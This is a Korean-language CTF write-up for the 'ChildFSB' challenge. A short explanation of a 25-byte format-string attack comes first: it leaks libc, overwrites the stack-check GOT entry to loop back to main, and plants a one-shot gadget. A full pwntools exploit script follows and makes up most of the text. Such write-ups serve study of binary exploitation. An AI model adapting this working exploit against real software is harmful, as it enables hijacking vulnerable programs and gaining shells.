ChildFSB

problem

25byte만 가지고 fsb을 통해 익스해야되는 문제이다

 

 

mitigation

 

main

fsb가 발생하고 카나리 1byte 덮을 수 있다

첫 fsb에서는 libc_start_main함수 leak하고 stack_chk_fail함수 2byte overwrite해서 다시 main으로 가도록 했다

그담에 onshot가젯으로 libc_start_main got주소 하위 3byte를 덮고 stack_chk_fail함수 got를 libc_start_main plt주소로 덮었다

 

from pwn import *


p = remote("ctf.j0n9hyun.xyz", 3037)
#p = process("./childfsb")
libc = ELF("libc.so.6")

#gdb.attach(p)


cnry = 0x601020
start_main = 0x601040

oneshot = [0x45216, 0x4526a, 0xf02a4, 0xf1147]

def ovr_byte(data):
    payload = "%{}c".format(str(data))
    payload += "%8$hhn"
    payload += "A" * (8 - int(len(payload) % 8 ))
    return bytes(payload, 'ascii')

def send_pay(payload):
    p.recvuntil(b"hello\n")
    p.send(payload)


payload = b"%1887c%8$hn%11$p"
payload += p64(cnry)
payload += b"A" * (0x19 - len(payload))
send_pay(payload)

p.recvuntil(b"0x")
libc_start_main = int(p.recv(12), 16)


libc_base = libc_start_main - libc.symbols['__libc_start_main'] - 240
oneshot = libc_base + oneshot[0]


log.info("libc_start_main: " + hex(libc_start_main - 240))
log.info("libc_base: " + hex(libc_base))
log.info("oneshot: " + hex(oneshot))


first_b = oneshot & 0xff
sec_b = (oneshot >> 8) & 0xff
third_b = (oneshot >> 16) & 0xff

log.info("1st_byte: " + hex(first_b))
log.info("2nd_byte: " + hex(sec_b))
log.info("3rd_byte: " + hex(third_b))

payload = ovr_byte(first_b)
payload += p64(start_main)
payload += b"A" * (0x19 - len(payload))
send_pay(payload)


payload = ovr_byte(sec_b)
payload += p64(start_main+1)
payload += b"A" * (0x19 - len(payload))
send_pay(payload)


payload = ovr_byte(third_b)
payload += p64(start_main+2)
payload += b"A" * (0x19 - len(payload))
send_pay(payload)

payload = b"%1536c%8$hn%11$p"
payload += p64(cnry)
payload += b"A" * (0x19 - len(payload))
send_pay(payload)

p.interactive()

 

flag